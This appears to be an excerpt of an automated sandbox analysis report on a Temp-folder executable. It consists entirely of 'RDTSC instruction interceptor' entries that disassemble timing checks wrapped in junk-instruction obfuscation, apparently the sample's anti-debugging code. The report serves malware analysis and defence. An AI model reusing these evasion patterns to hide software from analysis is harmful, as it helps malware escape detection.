Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50138 second address: 4A50170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 53E9F1D3h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3460CF07FCh 0x00000018 sbb ah, 00000058h 0x0000001b jmp 00007F3460CF07FBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50170 second address: 4A50176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50176 second address: 4A5019A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3460CF0807h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A5019A second address: 4A501A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A501A0 second address: 4A501E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F3460CF0800h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3460CF0807h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A501E5 second address: 4A5020D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 364Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007F3460BFB96Ch 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3460BFB96Eh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A5020D second address: 4A502ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007F3460CF07FAh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 jmp 00007F3460CF0801h 0x00000015 test esi, esi 0x00000017 jmp 00007F3460CF07FEh 0x0000001c je 00007F34D3A2EBC8h 0x00000022 pushad 0x00000023 mov cl, A0h 0x00000025 pushfd 0x00000026 jmp 00007F3460CF0803h 0x0000002b add eax, 35C4410Eh 0x00000031 jmp 00007F3460CF0809h 0x00000036 popfd 0x00000037 popad 0x00000038 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F3460CF07FCh 0x00000046 sub ax, 5788h 0x0000004b jmp 00007F3460CF07FBh 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F3460CF0808h 0x00000057 or esi, 609939E8h 0x0000005d jmp 00007F3460CF07FBh 0x00000062 popfd 0x00000063 popad 0x00000064 je 00007F34D3A2EB4Eh 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F3460CF0800h 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A502ED second address: 4A502F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A502F3 second address: 4A50353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, dword ptr [esi+44h] 0x0000000d jmp 00007F3460CF07FBh 0x00000012 or edx, dword ptr [ebp+0Ch] 0x00000015 jmp 00007F3460CF0806h 0x0000001a test edx, 61000000h 0x00000020 pushad 0x00000021 mov cl, 77h 0x00000023 popad 0x00000024 jne 00007F34D3A2EB50h 0x0000002a pushad 0x0000002b call 00007F3460CF0801h 0x00000030 mov ch, 5Bh 0x00000032 pop edx 0x00000033 popad 0x00000034 test byte ptr [esi+48h], 00000001h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50353 second address: 4A5035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A5035A second address: 4A50397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3460CF07FCh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F34D3A2EB2Ah 0x00000012 jmp 00007F3460CF07FCh 0x00000017 test bl, 00000007h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F3460CF07FDh 0x00000022 pop ecx 0x00000023 movsx ebx, si 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40799 second address: 4A40874 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 099B3F0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f call 00007F3460BFB977h 0x00000014 pushfd 0x00000015 jmp 00007F3460BFB978h 0x0000001a add esi, 1D2540B8h 0x00000020 jmp 00007F3460BFB96Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov ax, di 0x0000002e call 00007F3460BFB971h 0x00000033 pushfd 0x00000034 jmp 00007F3460BFB970h 0x00000039 sbb ax, DA48h 0x0000003e jmp 00007F3460BFB96Bh 0x00000043 popfd 0x00000044 pop esi 0x00000045 popad 0x00000046 and esp, FFFFFFF8h 0x00000049 jmp 00007F3460BFB96Fh 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 mov ebx, eax 0x00000052 mov ax, CAA7h 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F3460BFB976h 0x00000061 adc ecx, 38210F08h 0x00000067 jmp 00007F3460BFB96Bh 0x0000006c popfd 0x0000006d mov ax, 217Fh 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40874 second address: 4A4087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A4087A second address: 4A4087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A4087E second address: 4A408CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F3460CF0806h 0x00000011 xchg eax, esi 0x00000012 jmp 00007F3460CF0800h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A408CD second address: 4A408F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 06h 0x00000005 mov si, 4E7Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e mov ch, bl 0x00000010 popad 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3460BFB973h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A408F6 second address: 4A40921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3460CF0809h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40921 second address: 4A40927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40927 second address: 4A40961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b call 00007F3460CF0805h 0x00000010 movzx eax, bx 0x00000013 pop edx 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 je 00007F34D3A36236h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3460CF07FBh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40961 second address: 4A40967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40967 second address: 4A409C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F3460CF0807h 0x00000014 mov ecx, esi 0x00000016 jmp 00007F3460CF0806h 0x0000001b je 00007F34D3A361F4h 0x00000021 jmp 00007F3460CF0800h 0x00000026 test byte ptr [77816968h], 00000002h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov bx, ax 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A409C8 second address: 4A409EA instructions: 0x00000000 rdtsc 0x00000002 call 00007F3460BFB978h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx edi, ax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A409EA second address: 4A40A64 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 4Fh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F34D3A361BBh 0x0000000d jmp 00007F3460CF0805h 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 pushad 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 push esi 0x0000001a jmp 00007F3460CF0802h 0x0000001f mov dword ptr [esp], ebx 0x00000022 pushad 0x00000023 pushad 0x00000024 mov edi, eax 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 jmp 00007F3460CF0806h 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F3460CF0800h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a pop edx 0x0000003b mov eax, 3C713BBFh 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40A64 second address: 4A40A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40A6A second address: 4A40A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40A6E second address: 4A40ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB977h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushad 0x00000011 mov dx, 53A2h 0x00000015 pushfd 0x00000016 jmp 00007F3460BFB973h 0x0000001b sbb ax, 489Eh 0x00000020 jmp 00007F3460BFB979h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 push dword ptr [ebp+14h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F3460BFB96Dh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40ADC second address: 4A40AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop eax 0x00000011 mov dx, B76Ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40AFE second address: 4A40B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB977h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40BAF second address: 4A40BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F3460CF07FEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3460CF0807h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50CAD second address: 4A50CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50CB1 second address: 4A50CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50CB5 second address: 4A50CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50CBB second address: 4A50D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3460CF0800h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F3460CF07FCh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F3460CF07FCh 0x0000001d adc esi, 05734E98h 0x00000023 jmp 00007F3460CF07FBh 0x00000028 popfd 0x00000029 mov esi, 58D11C4Fh 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50D09 second address: 4A50D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50A7F second address: 4A50AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3460CF07FDh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50AA4 second address: 4A50B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB971h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3460BFB971h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push esi 0x00000012 mov edi, 722B6E0Eh 0x00000017 pop ebx 0x00000018 pushfd 0x00000019 jmp 00007F3460BFB974h 0x0000001e sbb cx, 2D58h 0x00000023 jmp 00007F3460BFB96Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d call 00007F3460BFB96Bh 0x00000032 movzx eax, dx 0x00000035 pop edi 0x00000036 popad 0x00000037 pop ebp 0x00000038 pushad 0x00000039 pushad 0x0000003a mov cl, 21h 0x0000003c mov ebx, 2A20EEFCh 0x00000041 popad 0x00000042 call 00007F3460BFB975h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AD0066 second address: 4AD00BA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3460CF07FAh 0x00000008 and ecx, 1595B7D8h 0x0000000e jmp 00007F3460CF07FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F3460CF0806h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F3460CF0807h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AD00BA second address: 4AD00D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB974h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AD00D2 second address: 4AD00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AD00D6 second address: 4AD00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AD00E5 second address: 4AD00E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AD00E9 second address: 4AD00EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102CE58 second address: 102CE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0446 second address: 4AC0456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB96Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0456 second address: 4AC0491 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF07FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3460CF0809h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3460CF07FDh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0491 second address: 4AC04B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 5626711Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3460BFB971h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC04B4 second address: 4AC04F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3460CF0807h 0x00000009 or si, 9ECEh 0x0000000e jmp 00007F3460CF0809h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC02A8 second address: 4AC02D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3460BFB975h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC02D0 second address: 4AC0302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3460CF0808h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0302 second address: 4AC0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0306 second address: 4AC030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC030C second address: 4AC031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB96Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50F9A second address: 4A50FB7 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov bx, 80D2h 0x0000000e push edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, 25C9h 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC06E1 second address: 4AC076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB976h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3460BFB970h 0x0000000f push eax 0x00000010 jmp 00007F3460BFB96Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F3460BFB974h 0x0000001d add eax, 2FC173B8h 0x00000023 jmp 00007F3460BFB96Bh 0x00000028 popfd 0x00000029 jmp 00007F3460BFB978h 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 jmp 00007F3460BFB96Dh 0x00000039 mov ch, ABh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC076F second address: 4AC0775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0775 second address: 4AC0779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0779 second address: 4AC07AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3460CF0807h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC07AF second address: 4AC07B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC07B4 second address: 4AC07F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c jmp 00007F3460CF0807h 0x00000011 call 00007F3460CF07F9h 0x00000016 pushad 0x00000017 mov bx, cx 0x0000001a mov ecx, 6615C567h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC07F1 second address: 4AC07F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC07F5 second address: 4AC07FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC07FB second address: 4AC0801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0801 second address: 4AC0805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC0805 second address: 4AC081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AC081A second address: 4AC0832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460CF0804h 0x00000009 rdtsc
